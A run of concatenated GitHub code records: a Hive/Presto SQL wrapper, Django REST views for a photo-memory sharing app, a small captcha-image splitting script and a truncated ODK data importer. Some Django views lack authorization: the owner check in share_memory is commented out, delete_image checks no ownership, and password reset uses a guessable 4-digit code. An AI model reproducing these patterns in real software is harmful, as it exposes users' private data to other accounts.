print(f\"Categorized {len(table)} entries\")\n return results\n\n#parse_table(pheme[\"text\"], \"pheme_categories.json\")\n#parse_table(twitter[\"text\"], \"twitter_categories.json\")\nparse_table(weibo[\"text\"], \"weibo_categories.json\")\n#print(twitter[\"text\"].iloc[385])\n#parse_table(twitter[\"text\"].iloc[385:387])\n\n\"\"\"\n# The text to analyze\ntext = \"Hello, world!\"\ndocument = language_v1.types.Document(\n content=text, type_=language_v1.types.Document.Type.PLAIN_TEXT\n)\n\n# Detects the sentiment of the text\nsentiment = client.analyze_sentiment(\n request={\"document\": document}\n).document_sentiment\n\nprint(f\"Text: {text}\")\nprint(f\"Sentiment: {sentiment.score}, 
{sentiment.magnitude}\")\"\"\"","repo_name":"WillTan14/wills-ensemble","sub_path":"categorizers/google_categorizer.py","file_name":"google_categorizer.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22111027254","text":"import decimal\nimport datetime\nimport json\n\n\nclass Hive:\n def __init__(self, host, port, database='', username=None, password=None):\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.database = database\n self.database = database\n self.connect = self.db_connect()\n self.cs = self.connect.cursor()\n\n def db_connect(self):\n \"\"\"连接初始化\"\"\"\n from pyhive import hive\n from pyhive.exc import DatabaseError\n try:\n connect = hive.Connection(\n host=self.host,\n port=self.port,\n username=self.username,\n password=self.password\n )\n except DatabaseError as err:\n raise Exception('数据库连接错误:', err)\n\n return connect\n\n def select(self, sql):\n \"\"\"查询\"\"\"\n self.cs.execute(sql)\n data = self.cs.fetchall()\n data_list = []\n row_headers = [x[0] for x in self.cs.description]\n for result in data:\n result_list = []\n for res in result:\n if isinstance(res, datetime.datetime):\n res = res.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(res, decimal.Decimal):\n res = float(res)\n result_list.append(res)\n data_list.append(dict(zip(row_headers, result_list)))\n self.close()\n return data_list\n\n def execute(self, sql):\n \"\"\"执行sql\"\"\"\n sql_check(sql)\n self.cs.execute(sql)\n self.connect.commit()\n self.close()\n\n def executemany(self, sql, *args):\n \"\"\"批量执行\"\"\"\n self.cs.executemany(sql, *args)\n self.connect.commit()\n self.close()\n\n def close(self):\n \"\"\"关闭连接\"\"\"\n self.cs.close()\n self.connect.close()\n\n\nclass PrestoDB:\n def __init__(self, host, port=9000, catalog='hive', user=None, password=None):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.catalog = catalog\n self.connect = self.db_connect()\n self.cs = self.connect.cursor()\n\n def db_connect(self):\n \"\"\"连接初始化\"\"\"\n try:\n connect = dbapi.connect(\n host=self.host,\n port=self.port,\n user=self.user,\n catalog=self.catalog\n )\n except exceptions.DatabaseError as err:\n raise Exception('数据库连接错误:', err)\n\n return connect\n\n def select(self, sql: str) -> list:\n \"\"\"查询\"\"\"\n sql = sql.replace('\"', \"'\")\n self.cs.execute(sql)\n data = self.cs.fetchall()\n data_list = []\n row_headers = [x[0] for x in self.cs.description]\n for result in data:\n result_list = []\n for res in result:\n if isinstance(res, datetime.datetime):\n res = res.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(res, decimal.Decimal):\n res = float(res)\n result_list.append(res)\n data_list.append(dict(zip(row_headers, result_list)))\n self.close()\n return data_list\n\n def execute(self, sql):\n \"\"\"执行sql\"\"\"\n sql_check(sql)\n self.cs.execute(sql)\n self.connect.commit()\n self.close()\n\n def executemany(self, sql, *args):\n \"\"\"批量执行\"\"\"\n self.cs.executemany(sql, *args)\n self.connect.commit()\n self.close()\n\n def close(self):\n \"\"\"关闭连接\"\"\"\n self.cs.close()\n self.connect.close()\n\n\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n # if isinstance(obj, str):\n # return obj.decode('utf8')\n else:\n return 
json.JSONEncoder.default(self, obj)\n\n\ndef sql_check(sql):\n if not any([True if i.upper() in sql.upper() else False for i in ['select', 'update', 'delete']]):\n raise RuntimeError(\"仅支持 'select', 'update', 'delete' 语句\")\n\n if 'UPDATE' in sql or 'DELETE' in sql.upper():\n if 'WHERE' not in sql.upper():\n raise RuntimeError('update, delete 语句必须包含 where 条件')\n","repo_name":"AHUsers/HTB","sub_path":"autotest/corelibs/exc_hive.py","file_name":"exc_hive.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41401248660","text":"from django.shortcuts import render\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom django.db.models import Q\r\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\r\nfrom rest_framework_simplejwt.views import TokenObtainPairView\r\nfrom django.contrib.auth.hashers import make_password, check_password\r\nfrom rest_framework import status\r\nfrom django.core.mail import EmailMessage\r\nfrom django.conf import settings\r\nimport random\r\nfrom django.core.paginator import Paginator\r\n\r\nfrom .models import Memory, User, Image, MemorySpace\r\nfrom .serializers import MemorySerializer, UserSerializer, UserSerializerWithToken, ImageSerializer, MemoryDetailsSerializer, MemorySpaceSerializer, MemorySpaceDetailsSerializer\r\n\r\n# Create your views here.\r\n\r\n\r\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\r\n def validate(self, attrs):\r\n data = super().validate(attrs)\r\n serializer = UserSerializerWithToken(self.user).data\r\n\r\n for key, value in serializer.items():\r\n data[key] = value\r\n\r\n return data\r\n\r\n\r\nclass MyTokenObtainPairView(TokenObtainPairView):\r\n serializer_class = MyTokenObtainPairSerializer\r\n\r\n\r\n@api_view([\"POST\"])\r\ndef register(request):\r\n serializer = UserSerializerWithToken(data=request.data)\r\n\r\n try:\r\n if serializer.is_valid():\r\n user = serializer.save()\r\n user.password = make_password(user.password)\r\n user.save()\r\n\r\n try:\r\n send_email(\"welcome to never fade\", f\"Hey {user.username}, welcome to never fade\", user.email)\r\n except:\r\n pass\r\n finally:\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_user_profile(request):\r\n user = User.objects.get(id=request.user.id)\r\n serializer = UserSerializerWithToken(user)\r\n return Response({\"user\": serializer.data})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_user(request):\r\n query = request.query_params[\"query\"].strip()\r\n\r\n if query == \"\":\r\n return Response({\"error\": \"provide a search query\"}, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n users = User.objects.filter(Q(username__icontains=query) | Q(\r\n email__icontains=query)).exclude(id=request.user.id)\r\n serializer = UserSerializer(users, many=True)\r\n\r\n return Response({\"users\": serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef update_user(request, user_id):\r\n user = User.objects.get(id=user_id)\r\n\r\n if request.user != user:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n 
try:\r\n serializer = UserSerializerWithToken(\r\n user, data=request.data, partial=True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef change_user_password(request, user_id):\r\n user = None\r\n\r\n try:\r\n user = User.objects.get(id=user_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user != user:\r\n return Response({\"error\": \"unathorized\"})\r\n\r\n if check_password(request.data[\"current_password\"], user.password):\r\n serializer = UserSerializerWithToken(\r\n user, data={\"password\": request.data[\"new_password\"]}, partial=True)\r\n\r\n if serializer.is_valid():\r\n user = serializer.save()\r\n user.password = make_password(request.data[\"new_password\"])\r\n user.save()\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n else:\r\n return Response({\"error\": \"the current password is incorrect\"})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\ndef get_password_reset_code (request, user_email):\r\n user = None\r\n\r\n try:\r\n user = User.objects.get(email = user_email)\r\n except:\r\n return Response({ \"error\": \"not found\" }, status = 404)\r\n\r\n # reset_code = random.randint(1000, 9999)\r\n # user.reset_code = reset_code\r\n\r\n # send_email(\"reset your password\", f\"The code to reset your password is { reset_code }\", user_email)\r\n # user.save()\r\n\r\n # return Response({})\r\n\r\n try:\r\n reset_code = random.randint(1000, 9999)\r\n user.reset_code = reset_code\r\n\r\n try:\r\n send_email(\"reset your password\", f\"The code to reset your password is { reset_code }\", user_email)\r\n user.save()\r\n except:\r\n return Response({}, status = 400)\r\n\r\n return Response({})\r\n except:\r\n return Response({}, status = 400)\r\n\r\n\r\n@api_view([\"PATCH\"])\r\ndef reset_user_password (request):\r\n user = None\r\n\r\n try:\r\n try:\r\n user = User.objects.get(email = request.data.get(\"email\"))\r\n except:\r\n return Response({ \"error\": \"not found\" }, status = 404)\r\n\r\n if user.reset_code != int(request.data.get(\"reset_code\")):\r\n return Response({ \"error\": \"invalid code\" }, status = 400)\r\n \r\n serializer = UserSerializer(user, data = { \"password\": request.data.get(\"new_password\") }, partial = True)\r\n \r\n if serializer.is_valid():\r\n user.password = make_password(request.data.get(\"new_password\"))\r\n user.reset_code = None\r\n user.save()\r\n\r\n return Response({})\r\n \r\n return Response({ \"errors\": serializer.errors }, status = 400)\r\n except:\r\n return Response({}, status = 400)\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_memories(request):\r\n memories = None\r\n memory_space = request.query_params.get(\"memory-space\")\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n if memory_space:\r\n memories = Memory.objects.filter(Q(memory_space=memory_space) & Q(\r\n memory_space__users__id=request.user.id))\r\n else:\r\n memories = Memory.objects.filter(\r\n owner=request.user.id).filter(memory_space=None)\r\n\r\n paginator = Paginator(memories, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySerializer(page.object_list, many=True)\r\n\r\n return Response({\"memories\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": 
page.has_previous()})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_shared_memories(request):\r\n type = request.query_params[\"type\"]\r\n query = None\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n if type == \"with me\":\r\n query = ~Q(owner=request.user.id) & Q(shared_with__id=request.user.id)\r\n elif type == \"by me\":\r\n query = Q(owner=request.user.id) & Q(shared=True)\r\n\r\n memories = Memory.objects.filter(query)\r\n paginator = Paginator(memories, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySerializer(page.object_list, many=True)\r\n\r\n return Response({\"memories\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": page.has_previous()})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef create_memory(request):\r\n image = request.data.get(\"images\")\r\n images = None\r\n\r\n if image:\r\n images = request.FILES.getlist(\"images\")\r\n request.data.pop(\"images\")\r\n\r\n serializer = MemorySerializer(data=request.data)\r\n\r\n if serializer.is_valid():\r\n memory = serializer.save()\r\n memory.owner = request.user\r\n\r\n if not memory.date:\r\n memory.date = memory.created_at\r\n\r\n images_to_serialize = []\r\n\r\n if images:\r\n for image in images:\r\n images_to_serialize.append({ \"image\": image, \"memory\": memory.id })\r\n\r\n image_serializer = ImageSerializer(data = images_to_serialize[:14], many = True)\r\n\r\n if image_serializer.is_valid():\r\n image_serializer.save()\r\n memory.preview = image_serializer.data[0][\"image\"][60:]\r\n else:\r\n memory.delete()\r\n return Response({\"errors\": image_serializer.errors})\r\n\r\n memory.save()\r\n\r\n return Response({\"memory\": serializer.data}, status=201)\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_memory_details(request, memory_id):\r\n memory = None\r\n\r\n try:\r\n memory = Memory.objects.get(id=memory_id)\r\n except:\r\n return Response({\"error\": \"not found\"}, status=404)\r\n\r\n if (memory.memory_space):\r\n if request.user not in memory.memory_space.users.all() and request.user not in list(memory.shared_with.all()):\r\n return Response({\"error\": \"unauthorized\"})\r\n else:\r\n if memory.owner != request.user and request.user not in list(memory.shared_with.all()):\r\n return Response({\"error\": \"unauthorized\"}, status=400)\r\n\r\n try:\r\n images = Image.objects.filter(memory=memory)\r\n serializer = MemoryDetailsSerializer(memory)\r\n imageSerializer = ImageSerializer(images, many=True)\r\n return Response({\"memory\": serializer.data, \"images\": imageSerializer.data})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef edit_memory(request, memory_id):\r\n memory = None\r\n\r\n try:\r\n memory = Memory.objects.get(id=memory_id)\r\n except:\r\n return Response({\"error\": \"not found\"}, status=404)\r\n\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n try:\r\n serializer = MemorySerializer(memory, data=request.data, partial=True)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"memory\": serializer.data})\r\n\r\n return Response({\"errors\": serializer.errors}, status=400)\r\n except:\r\n return Response({\"error\": \"memory not found\"}, 
status=404)\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef share_memory(request, memory_id):\r\n memory = Memory.objects.get(id=memory_id)\r\n userIDs = request.data[\"shared_with\"]\r\n replace = request.query_params[\"replace\"]\r\n\r\n # if memory.owner.id != request.user.id:\r\n # return Response({\"error\": \"unauthorized\"})\r\n\r\n try:\r\n\r\n if replace == \"true\":\r\n memory.shared_with.set(request.data[\"shared_with\"])\r\n else:\r\n for userID in userIDs:\r\n memory.shared_with.add(userID)\r\n\r\n if len(list(memory.shared_with.all())):\r\n memory.shared = True\r\n else:\r\n memory.shared = False\r\n\r\n memory.save()\r\n serializer = MemoryDetailsSerializer(memory)\r\n\r\n return Response({\"memory\": serializer.data})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_memory(request):\r\n query = request.query_params[\"query\"]\r\n memories = Memory.objects.filter(\r\n Q(title__icontains=query) | Q(description__icontains=query) | Q(date__icontains=query) | Q(category__icontains=query)).filter(Q(owner=request.user) | Q(memory_space__users__id=request.user.id)).distinct()\r\n serializer = MemorySerializer(memories, many=True)\r\n return Response({\"memories\": serializer.data})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_memory(request, memory_id):\r\n memory = Memory.objects.get(id=memory_id)\r\n\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memory.delete()\r\n\r\n return Response({})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef add_images(request, memory_id):\r\n memory = Memory.objects.get(id=memory_id)\r\n\r\n if memory.memory_space:\r\n if request.user not in memory.memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n else:\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n images = request.FILES.getlist(\"images\")\r\n images_to_serialize = []\r\n serialized_images = []\r\n\r\n if images:\r\n for image in images:\r\n images_to_serialize.append({ \"image\": image, \"memory\": memory.id })\r\n\r\n serializer = ImageSerializer(data = images_to_serialize[:14], many = True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n if not memory.preview:\r\n memory.preview = serializer.data[0][\"image\"][60:]\r\n memory.save()\r\n print(memory)\r\n serialized_images = serializer.data\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n return Response({\"images\": serialized_images})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_image(request, image_id):\r\n image = Image.objects.get(id=image_id)\r\n memory = Memory.objects.get(id=image.memory.id)\r\n image.delete()\r\n memory_images = Image.objects.filter(memory=memory)\r\n\r\n if (len(memory_images)) > 0:\r\n image_serializer = ImageSerializer(memory_images[0], many=False)\r\n memory.preview = image_serializer.data[\"image\"][60:]\r\n else:\r\n memory.preview = None\r\n\r\n memory.save()\r\n\r\n return Response({})\r\n\r\n\r\n@ api_view([\"POST\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef create_memory_space(request):\r\n serializer = MemorySpaceSerializer(data=request.data, many=False)\r\n\r\n try:\r\n if serializer.is_valid():\r\n memory_space = serializer.save()\r\n memory_space.users.add(request.user)\r\n 
memory_space.created_by = request.user\r\n memory_space.save()\r\n\r\n return Response({\"memory_space\": serializer.data}, status=201)\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({})\r\n\r\n\r\n@ api_view([\"GET\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef get_memory_spaces(request):\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n memory_spaces = MemorySpace.objects.filter(users__id=request.user.id)\r\n paginator = Paginator(memory_spaces, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySpaceSerializer(page.object_list, many=True)\r\n\r\n return Response({\"memory_spaces\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": page.has_previous()})\r\n\r\n\r\n@ api_view([\"GET\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef get_memory_space_details(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memories = Memory.objects.filter(memory_space=memory_space)\r\n serializer = MemorySpaceDetailsSerializer(memory_space)\r\n memory_serializer = MemorySerializer(memories, many=True)\r\n\r\n return Response({\"memory_space\": serializer.data, \"memories\": memory_serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef edit_memory_space(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n serializer = MemorySpaceSerializer(\r\n memory_space, data=request.data, partial=True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"memory_space\": serializer.data})\r\n\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_memory_space(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memory_space.delete()\r\n\r\n return Response({})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_memory_space(request):\r\n query = request.query_params.get(\"query\")\r\n memory_spaces = MemorySpace.objects.filter(\r\n Q(name=query) | Q(description__icontains=query)).filter(Q(users__id=request.user.id))\r\n serializer = MemorySpaceSerializer(memory_spaces, many=True)\r\n return Response({\"memory_spaces\": serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef add_memory_space_members(request, memory_space_id):\r\n memory_space = None\r\n replace = request.query_params[\"replace\"]\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n if replace == \"true\":\r\n memory_space.users.set(request.data[\"members\"])\r\n else:\r\n for 
userID in request.data[\"members\"]:\r\n memory_space.users.add(userID)\r\n\r\n memory_space.save()\r\n serializer = MemorySpaceDetailsSerializer(memory_space)\r\n\r\n return Response({\"memory_space\": serializer.data})\r\n\r\ndef send_email (subject, body, recepient):\r\n email = EmailMessage(\r\n subject,\r\n body,\r\n settings.EMAIL_HOST_USER,\r\n [recepient]\r\n )\r\n email.fail_silently = False\r\n email.send()\r\n","repo_name":"pratiic/never-fade","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3469405326","text":"# -*- coding:utf-8 -*-\n\nfrom PIL import Image\nimport sys\n\n\ndef fill_image(image):\n width, height = image.size\n print(width, height)\n\n new_image_length = width if width > height else height\n\n print(new_image_length)\n\n # new_image = Image.new(image.mode, (new_image_length, new_image_length), color='white')\n new_image = Image.new(image.mode, (width, height), color='white')\n\n new_image.paste(image, (0, 0))\n return new_image\n\n\ndef cut_image(image):\n width, height = image.size\n item_width = int(width / 2)\n item_height = int (height)\n box_list = []\n for i in range(2):\n box = (i * item_width, 0 * item_height, (i + 1) * item_width, 1 * item_height)\n box_list.append(box)\n image_list = [image.crop(box) for box in box_list]\n return image_list\n\n\ndef save_images(image_list):\n index = 1\n for image in image_list:\n image.save(r'../pic/result/' + str(index) + r'.png')\n index += 1\n\n\nif __name__ == '__main__':\n file_path = \"yidun_img_0.jpg\"\n # 打开图像\n image = Image.open(file_path)\n # 将图像转为正方形,不够的地方补充为白色底色\n image = fill_image(image)\n # 分为图像\n image_list = cut_image(image)\n # 保存图像\n save_images(image_list)","repo_name":"lenfranky/slide_block_operation","sub_path":"Verification/pic_division.py","file_name":"pic_division.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25073483899","text":"\"\"\"The main processing unit for processing ODK options\n\n\"\"\"\nimport csv\nimport re\nimport datetime\nimport uuid\nimport pytz\nimport json\n\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom raven import Client\n\nfrom .terminal_output import Terminal\nfrom .models import Recipients, DictionaryItems, SubCounty, Ward, Village, RawSubmissions, SyndromicIncidences\n\nterminal = Terminal()\nsentry = Client(settings.SENTRY_DSN)\n\nsettings.TIME_ZONE\ncurrent_tz = pytz.timezone(settings.TIMEZONE)\ntimezone.activate(current_tz)\n\n\nclass ImportODKChoices():\n def __init__(self):\n # silence is golden\n self.module_name = 'Processing ODK Choices'\n # the mandatory headers for the choices spreadsheet\n self.odk_mandatory_headers = ['list_name', 'name', 'label', 'county', 'syndromes', 'disease', 'cdr_village', 'ward_subcounty', 'village_ward', 'enumerator_subcounty']\n self.phone_number_update_headers = ['username', 'phone_number']\n\n def process_odk_choices_file(self, input_file):\n terminal.tprint('Processing the file %s...' 
% input_file, 'info')\n\n try:\n transaction.set_autocommit(False)\n with open(input_file, 'rt', -1, 'utf-8') as in_file:\n test_data = csv.DictReader(in_file, delimiter=',', quotechar='\"')\n self.confirm_data_headers(test_data.fieldnames, self.odk_mandatory_headers)\n for row in test_data:\n # print(row.values())\n try:\n if row['list_name'] == 'sub_county':\n self.process_subcounty(row)\n elif row['list_name'] == 'wards':\n self.process_ward(row)\n elif row['list_name'] == 'villages':\n self.process_village(row)\n elif row['list_name'] == 'cdrs':\n self.process_personnel(row, 'cdr')\n elif row['list_name'] == 'enumerators':\n self.process_personnel(row, 'enumerator')\n elif row['list_name'] == 'livhealth_mgmnt':\n self.process_personnel(row, 'livhealth_mgmnt')\n elif row['list_name'] == 'livhealth_admin':\n self.process_personnel(row, 'livhealth_admin')\n except ObjectDoesNotExist:\n continue\n except UnicodeDecodeError as e:\n terminal.tprint(\"Cannot process the data below.\\n%s\" % str(e), 'fail')\n except Exception as e:\n transaction.rollback()\n sentry.captureException()\n terminal.tprint(str(e), 'fail')\n\n transaction.commit()\n terminal.tprint(\"The input file '%s' with test data has been processed successfully...\" % input_file, 'info')\n\n def confirm_data_headers(self, file_headers, mandatory_headers):\n missing_headers = []\n for header in mandatory_headers:\n if header not in file_headers:\n missing_headers.append(header)\n\n if len(missing_headers):\n raise Exception(\"The input file is missing '%s' column(s) which is required\" % ', '.join(missing_headers))\n\n def process_subcounty(self, subcounty):\n \"\"\"Given a sub county details, add it to the database if it does not exist\n\n \"\"\"\n try:\n sub_county = SubCounty.objects.filter(nick_name=subcounty['name'].strip()).get()\n except SubCounty.DoesNotExist:\n try:\n sub_county = SubCounty(\n sub_county_name=subcounty['label'].strip(),\n nick_name=subcounty['name'].strip()\n )\n sub_county.full_clean()\n sub_county.save()\n except Exception:\n raise\n except Exception:\n raise\n\n return sub_county\n\n def process_ward(self, ward):\n \"\"\"Given a ward details, add it to the database if it does not exist\n \"\"\"\n try:\n saved_ward = Ward.objects.filter(nick_name=ward['name'].strip()).get()\n except Ward.DoesNotExist:\n try:\n # get the subcounty of this ward\n sub_county = SubCounty.objects.filter(nick_name=ward['ward_subcounty'].strip()).get()\n saved_ward = Ward(\n ward_name=ward['label'].strip(),\n nick_name=ward['name'].strip(),\n sub_county=sub_county\n )\n saved_ward.full_clean()\n saved_ward.save()\n except SubCounty.DoesNotExist:\n message = \"'%s' sub county does not exist in the database.\" % ward['ward_subcounty'].strip()\n terminal.tprint(message, 'info')\n raise ObjectDoesNotExist(message)\n except Exception:\n raise\n except Exception:\n raise\n\n return saved_ward\n\n def process_village(self, village):\n \"\"\"Given a ward details, add it to the database if it does not exist\n \"\"\"\n try:\n saved_village = Village.objects.filter(nick_name=village['name'].strip()).get()\n except Village.DoesNotExist:\n try:\n # get the ward of the current village\n ward = Ward.objects.filter(nick_name=village['village_ward'].strip()).get()\n saved_village = Village(\n village_name=village['label'].strip(),\n nick_name=village['name'].strip(),\n ward=ward\n )\n saved_village.full_clean()\n saved_village.save()\n except Ward.DoesNotExist:\n message = \"'%s' ward does not exist in the database.\" % 
village['village_ward'].strip()\n terminal.tprint(message, 'info')\n raise ObjectDoesNotExist(message)\n except Exception:\n raise\n except Exception:\n raise\n\n return saved_village \n\n def process_personnel(self, pers, pers_type):\n # we are only interested in updating CDR details\n # check if the cdr details are already saved in the database... if they are, update them if they are different\n try:\n personnel = Recipients.objects.filter(username=pers['name'].strip()).get()\n except Recipients.DoesNotExist:\n # the pers is not saved in the Recipients database, so lets add him\n # get the village of this CDR\n village = None\n sub_county = None\n try:\n if pers_type == 'cdr':\n village = Village.objects.filter(nick_name=pers['cdr_village'].strip()).get()\n elif pers_type == 'enumerator':\n sub_county = SubCounty.objects.filter(nick_name=pers['enumerator_subcounty']).get()\n else:\n sub_county = None\n\n cdr_label = pers['label'].strip()\n if re.search('^Dr|Mr|Mrs|Prof|Miss\\.?', cdr_label) is None:\n cdr_names = cdr_label.split()\n salutation = None\n else:\n # exclude the salutation, strip the remainder string of spaces and split it\n split_names = re.split('^(Dr|Mrs|Mr|Prof|Miss)\\.?', cdr_label)\n salutation = split_names[1:2][0]\n cdr_names = split_names[2:][0].strip().split()\n\n # print(\"%s == %s: %s - %s - %s\" % (cdr_label, salutation if salutation is not None else '', cdr_names[:1][0], ' '.join(cdr_names[1:]), pers['name'].strip()))\n personnel = Recipients(\n salutation=salutation,\n first_name=cdr_names[:1][0],\n other_names=None if len(cdr_names[1:]) == 0 else ' '.join(cdr_names[1:]),\n username=pers['name'].strip(),\n designation=pers_type,\n village=village,\n sub_county=sub_county\n )\n personnel.full_clean()\n personnel.save()\n except Village.DoesNotExist:\n terminal.tprint(\"'%s' village does not exist in the database.\" % pers['cdr_village'].strip(), 'info')\n except Exception:\n raise\n except Exception:\n raise\n\n def process_phone_numbers(self, input_file):\n # we have a list of phone numbers that we need to update in our contact list\n terminal.tprint('Processing the file %s...' % input_file, 'info')\n\n try:\n transaction.set_autocommit(False)\n with open(input_file, 'rt', -1, 'utf-8') as in_file:\n test_data = csv.DictReader(in_file, delimiter=',', quotechar='\"')\n self.confirm_data_headers(test_data.fieldnames, self.phone_number_update_headers)\n for row in test_data:\n # terminal.tprint(json.dumps(row), 'error')\n self.update_personnel(row)\n except UnicodeDecodeError as e:\n terminal.tprint(\"Cannot process the data below.\\n%s\" % str(e), 'fail')\n except Exception as e:\n transaction.rollback()\n sentry.captureException()\n terminal.tprint(str(e), 'fail')\n\n transaction.commit()\n terminal.tprint(\"The input file '%s' with test data has been processed successfully...\" % input_file, 'info')\n\n def update_personnel(self, pers):\n try:\n personnel = Recipients.objects.filter(username=pers['nick_name'].strip()).get()\n to_save = False\n processed_number = self.format_phone_number(pers['phone_number'])\n if 'email' in pers:\n if pers['email'].strip() != '':\n # we have some email... 
